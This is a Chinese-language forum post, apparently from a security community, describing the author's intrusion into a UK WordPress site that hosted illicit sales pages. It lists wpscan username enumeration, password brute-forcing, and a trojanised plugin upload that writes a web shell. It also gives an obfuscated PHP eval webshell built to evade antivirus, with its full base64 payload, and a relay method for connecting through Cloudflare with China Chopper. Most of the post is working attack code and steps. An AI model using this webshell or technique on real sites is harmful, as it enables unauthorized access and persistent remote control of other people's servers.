接到XX的指示,需要处理一件违禁物品的case。
目标网站:http://*********.co.uk/site/index.htm

查看主域名 http://www.********.co.uk/

CMS为WordPress。卖货的原来是开在英国服务器的寄生站,说明主站已被getshell了。
信息搜集差不多开始切入,根据wpcms目录结构查找后台 http://www.*********.co.uk/wp-login.php


用wpscan工具 对网站进行辅助嗅探(信息搜集要善用强大的工具)

wpscan --url http://www.*******.co.uk --enumerate u


可获得wordpress版本及插件版本信息,敏感目录,用户名


对用户名进行密码爆破,得到密码pass,成功登录后台(弱口令是诸多成功渗透案例的原因)


尝试寻找上传点传图片马,但是上传校验严格,未找到上传点,编辑插件plugins 404出错,无法将一句话编辑入插件(遇到了些许困难,渗透过程从来不是一帆风顺)


尝试百度wordprss插件下载,然后本地修改再上传插件激活(这是一个思路)
解压插件,改其中一个文件:利用file_put_contents(“xx.php”,’字符串’)写入一句话


这里需要注意判断并找到一句话最后的写入目录(../ma.php,or../../ma.php,or../../../ma.php,or....自己找)
最后为../aaaa.php 测试写入phpinfo()测试,成功
接下来就是怎么连了,cloudfire的缘故无法直接连接菜刀,主机存在杀毒软件,采用:变形老一句话,base64中转连接
变形老一句话

@eval(base64_decode($_POST['chop']));
QGVs2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2Nob3AnXSkpOw==

注意第四个s,s为下方$vbl去除的字符(也是为了混淆)

<?php $uf="BPU1";
$ka="QGVs2YWwoYmFzZT";
$pjt="Y0X2RlY29kZSgkX1";
$vbl = str_replace("ti","","tistittirti_rtietipltiatice"); $iqw="RbJ2Nob3AnXSkpOw==";
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy = $sbp("", $bkf($vbl("s","", $ka.$pjt.$uf.$iqw))); $mpy(); ?>css_conf

最后合并为一行,Base64编码

PD9waHAgJHVmPSJCUFUxIjsgJGthPSJRR1ZzMllXd29ZbUZ6WlQiOyAkcGp0PSJZMFgyUmxZMjlrWlNna1gxIjsgJHZibCA9IHN0cl9yZXBsYWNlKCJ0aSIsIiIsInRpc3RpdHRpcnRpX3J0aWV0aXBsdGlhdGljZSIpOyAkaXF3PSJSYkoyTm9iM0FuWFNrcE93PT0iOyAkYmtmID0gJHZibCgiayIsICIiLCAia2Jha3NrZTZrNGtfa2RrZWtja29rZGtlIik7ICRzYnAgPSAkdmJsKCJjdHciLCIiLCJjdHdjY3R3cmVjdHdhdGN0d2VjdHdfZmN0d3VuY2N0d3RjdHdpb2N0d24iKTsgJG1weSA9ICRzYnAoIiIsICRia2YoJHZibCgicyIsIiIsICRrYS4kcGp0LiR1Zi4kaXF3KSkpOyAkbXB5KCk7ID8+Y3NzX2NvbmY=

利用刚才的插件写入

file_put_contents("../llll.php",base64_decode('PD9waHAgJHVmPSJCUFUxIjsgJGthPSJRR1ZzMllXd29ZbUZ6WlQiOyAkcGp0PSJZMFgyUmxZMjlrWlNna1gxIjsgJHZibCA9IHN0cl9yZXBsYWNlKCJ0aSIsIiIsInRpc3RpdHRpcnRpX3J0aWV0aXBsdGlhdGljZSIpOyAkaXF3PSJSYkoyTm9iM0FuWFNrcE93PT0iOyAkYmtmID0gJHZibCgiayIsICIiLCAia2Jha3NrZTZrNGtfa2RrZWtja29rZGtlIik7ICRzYnAgPSAkdmJsKCJjdHciLCIiLCJjdHdjY3R3cmVjdHdhdGN0d2VjdHdfZmN0d3VuY2N0d3RjdHdpb2N0d24iKTsgJG1weSA9ICRzYnAoIiIsICRia2YoJHZibCgicyIsIiIsICRrYS4kcGp0LiR1Zi4kaXF3KSkpOyAkbXB5KCk7ID8+Y3NzX2NvbmY='));

将文件添加入压缩包

上传插件,并激活


激活插件,执行写入文件


访问shell地址,可以写入


你有cloudfire我有php的base64中转脚本连接


这里还连接失败了一次,尝试添加登录后台cookie继续,成功开启脚本(指定一个未占用端口 9900)


可以菜刀了

没什么技术含量,翻翻旧账,丰富下先知的娱乐生活。轻点喷

点击收藏 | 2 关注 | 2
  • 动动手指,沙发就是你的了!
登录 后跟帖